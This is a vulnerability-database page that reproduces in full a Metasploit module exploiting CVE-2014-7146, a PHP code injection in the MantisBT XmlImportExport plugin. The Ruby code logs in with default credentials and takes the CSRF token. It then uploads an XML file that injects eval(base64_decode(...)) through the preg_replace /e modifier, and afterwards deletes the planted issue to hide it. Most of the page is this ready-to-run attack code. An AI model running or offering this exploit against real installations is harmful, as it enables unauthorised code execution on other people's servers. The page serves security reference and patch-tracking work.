Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Mantis Bug Tracker 1.2.0a3 < 1.2.17 XmlImportExport Plugin - PHP Code Injection (Metasploit) (2)

🗓️ 18 Nov 2014 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 43 Views

MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability, allows remote attackers to execute arbitrary PHP code

Related
Code
ReporterTitlePublishedViews
Family
0day.today		MantisBT XmlImportExport Plugin PHP Code Injection Exploit
16 Nov 201400:00
zdt
0day.today		MantisBT XmlImportExport Plugin PHP Code Injection Exploit
18 Nov 201400:00
zdt
0day.today		Mantis Bug Tracker 1.2.17 PHP Code Injection Vulnerability
1 Jan 201500:00
zdt
0day.today		MantisBT 1.2.0a3 < 1.2.17 - XmlImportExport Plugin PHP Code Injection Exploit
23 Mar 201700:00
zdt
Tenable Nessus		MantisBT < 1.2.18 Multiple Vulnerabilities
18 Feb 201500:00
nessus
Tenable Nessus		Debian DSA-3120-1 : mantis - security update
8 Jan 201500:00
nessus
Tenable Nessus		Fedora 19 : mantis-1.2.17-4.fc19 (2014-15079)
15 Dec 201400:00
nessus
Tenable Nessus		Fedora 20 : mantis-1.2.17-4.fc20 (2014-15108)
15 Dec 201400:00
nessus
Tenable Nessus		Fedora 21 : mantis-1.2.17-4.fc21 (2014-15142)
15 Dec 201400:00
nessus
Tenable Nessus		MantisBT 1.2.x < 1.2.18 Multiple Vulnerabilities
22 Jan 201500:00
nessus
Rows per page
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability',
      'Description'    => %q{
        This module exploits a post-auth vulnerability found in MantisBT versions 1.2.0a3 up to 1.2.17 when the Import/Export plugin is installed.
        The vulnerable code exists on plugins/XmlImportExport/ImportXml.php, which receives user input through the "description" field and the "issuelink" attribute of an uploaded XML file and passes to preg_replace() function with the /e modifier.
        This allows a remote authenticated attacker to execute arbitrary PHP code on the remote machine.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Egidio Romano', # discovery http://karmainsecurity.com
          'Juan Escobar <eng.jescobar[at]gmail.com>', # module development @itsecurityco
        ],
      'References'     =>
        [
          ['CVE', '2014-7146']
        ],
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Generic (PHP Payload)', {}]],
      'DisclosureDate' => 'Nov 8 2014',
      'DefaultTarget'  => 0))

      register_options(
      [
        OptString.new('USERNAME', [ true, 'Username to authenticate as', 'administrator']),
        OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', 'root']),
        OptString.new('TARGETURI', [ true, 'Base directory path', '/'])
      ], self.class)
  end

  def check
    res = exec_php('phpinfo(); die();', true)

    if res && res.body =~ /This program makes use of the Zend/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Unknown
    end
  end

  def do_login()
    print_status('Checking access to MantisBT...')
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'login_page.php'),
      'vars_get' => {
        'return'  => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import')
      }
    })

    fail_with(Failure::NoAccess, 'Error accessing MantisBT') unless res && res.code == 200

    session_cookie = res.get_cookies

    print_status('Logging in...')
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'login.php'),
      'cookie'    => session_cookie,
      'vars_post' => {
        'return'  => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import'),
        'username' => datastore['username'],
        'password' => datastore['password'],
        'secure_session' => 'on'
      }
    })


    fail_with(Failure::NoAccess, 'Login failed') unless res && res.code == 302

    fail_with(Failure::NoAccess, 'Wrong credentials') unless res.redirection.to_s !~ /login_page.php/

    "#{session_cookie} #{res.get_cookies}"
  end

  def upload_xml(payload_b64, rand_text, cookies, is_check)

    if is_check
      timeout = 20
    else
      timeout = 3
    end

    rand_num = Rex::Text.rand_text_numeric(1, 9)

    print_status('Checking XmlImportExport plugin...')
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'plugin.php'),
      'cookie'   => cookies,
      'vars_get' => {
        'page' => 'XmlImportExport/import'
      }
    })

    unless res && res.code == 200
      print_error('Error trying to access XmlImportExport/import page...')
      return false
    end

    # Retrieving CSRF token
    if res.body =~ /name="plugin_xml_import_action_token" value="(.*)"/
      csrf_token = Regexp.last_match[1]
    else
      print_error('Error trying to read CSRF token')
      return false
    end

    # Retrieving default project id
    if res.body =~ /name="project_id" value="([0-9]+)"/
      project_id = Regexp.last_match[1]
    else
      print_error('Error trying to read project id')
      return false
    end

    # Retrieving default category id
    if res.body =~ /name="defaultcategory">[.|\r|\r\n]*<option value="([0-9])" selected="selected" >\(select\)<\/option><option value="1">\[All Projects\] (.*)<\/option>/
      category_id = Regexp.last_match[1]
      category_name = Regexp.last_match[2]
    else
      print_error('Error trying to read default category')
      return false
    end

    # Retrieving default max file size
    if res.body =~ /name="max_file_size" value="([0-9]+)"/
      max_file_size = Regexp.last_match[1]
    else
      print_error('Error trying to read default max file size')
      return false
    end

    # Retrieving default step
    if res.body =~ /name="step" value="([0-9]+)"/
      step = Regexp.last_match[1]
    else
      print_error('Error trying to read default step value')
      return false
    end

    xml_file =   %Q|
    <mantis version="1.2.17" urlbase="http://localhost/" issuelink="${eval(base64_decode(#{ payload_b64 }))}}" notelink="~" format="1">
        <issue>
            <id>#{ rand_num }</id>
            <project id="#{ project_id }">#{ rand_text }</project>
            <reporter id="#{ rand_num }">#{ rand_text }</reporter>
            <priority id="30">normal</priority>
            <severity id="50">minor</severity>
            <reproducibility id="70">have not tried</reproducibility>
            <status id="#{ rand_num }">new</status>
            <resolution id="#{ rand_num }">open</resolution>
            <projection id="#{ rand_num }">none</projection>
            <category id="#{ category_id }">#{ category_name }</category>
            <date_submitted>1415492267</date_submitted>
            <last_updated>1415507582</last_updated>
            <eta id="#{ rand_num }">none</eta>
            <view_state id="#{ rand_num }">public</view_state>
            <summary>#{ rand_text }</summary>
            <due_date>1</due_date>
            <description>{${eval(base64_decode(#{ payload_b64 }))}}1</description>
        </issue>
    </mantis>
    |

    data = Rex::MIME::Message.new
    data.add_part("#{ csrf_token }", nil, nil, "form-data; name=\"plugin_xml_import_action_token\"")
    data.add_part("#{ project_id }", nil, nil, "form-data; name=\"project_id\"")
    data.add_part("#{ max_file_size }", nil, nil, "form-data; name=\"max_file_size\"")
    data.add_part("#{ step }", nil, nil, "form-data; name=\"step\"")
    data.add_part(xml_file, "text/xml", "UTF-8", "form-data; name=\"file\"; filename=\"#{ rand_text }.xml\"")
    data.add_part("renumber", nil, nil, "form-data; name=\"strategy\"")
    data.add_part("link", nil, nil, "form-data; name=\"fallback\"")
    data.add_part("on", nil, nil, "form-data; name=\"keepcategory\"")
    data.add_part("#{ category_id }", nil, nil, "form-data; name=\"defaultcategory\"")
    data_post = data.to_s

    print_status('Sending payload...')
    return send_request_cgi({
      'method'  => 'POST',
      'uri'     => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import_action'),
      'cookie' => cookies,
      'ctype'   => "multipart/form-data; boundary=#{ data.bound }",
      'data'    => data_post
    }, timeout)
  end

  def exec_php(php_code, is_check = false)

    # remove comments, line breaks and spaces of php_code
    payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')

    # clean b64 payload
    while Rex::Text.encode_base64(payload_clean) =~ /=/
      payload_clean = "#{ payload_clean } "
    end
    payload_b64 = Rex::Text.encode_base64(payload_clean)

    rand_text = Rex::Text.rand_text_alpha(5, 8)

    cookies = do_login()

    res_payload = upload_xml(payload_b64, rand_text, cookies, is_check)

    # When a meterpreter session is active, communication with the application is lost.
    # Must login again in order to recover the communication. Thanks to @FireFart for figure out how to fix it.
    cookies = do_login()

    print_status("Deleting issue (#{ rand_text })...")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'my_view_page.php'),
      'cookie' => cookies
    })

    unless res && res.code == 200
      print_error('Error trying to access My View page')
      return false
    end

    if res.body =~ /title="\[@[0-9]+@\] #{ rand_text }">0+([0-9]+)<\/a>/
      issue_id = Regexp.last_match[1]
     else
      print_error('Error trying to retrieve issue id')
      return false
    end

    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'bug_actiongroup_page.php'),
      'cookie'   => cookies,
      'vars_get' => {
        'bug_arr[]' => issue_id,
        'action' => 'DELETE',
      },
    })

    if res && res.body =~ /name="bug_actiongroup_DELETE_token" value="(.*)"\/>/
      csrf_token = Regexp.last_match[1]
    else
      print_error('Error trying to retrieve CSRF token')
      return false
    end

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'bug_actiongroup.php'),
      'cookie'   => cookies,
      'vars_post' => {
        'bug_actiongroup_DELETE_token' => csrf_token,
        'bug_arr[]' => issue_id,
        'action' => 'DELETE',
      },
    })

    if res && res.code == 302 || res.body !~ /Issue #{ issue_id } not found/
      print_status("Issue number (#{ issue_id }) removed")
    else
      print_error("Removing issue number (#{ issue_id }) has failed")
      return false
    end

    # if check return the response
    if is_check
      return res_payload
    else
      return true
    end
  end

  def exploit
    unless exec_php(payload.encoded)
      fail_with(Failure::Unknown, 'Exploit failed, aborting.')
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Nov 2014 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
EPSS0.80388
mantisbtxmlimportexportphp code injection
43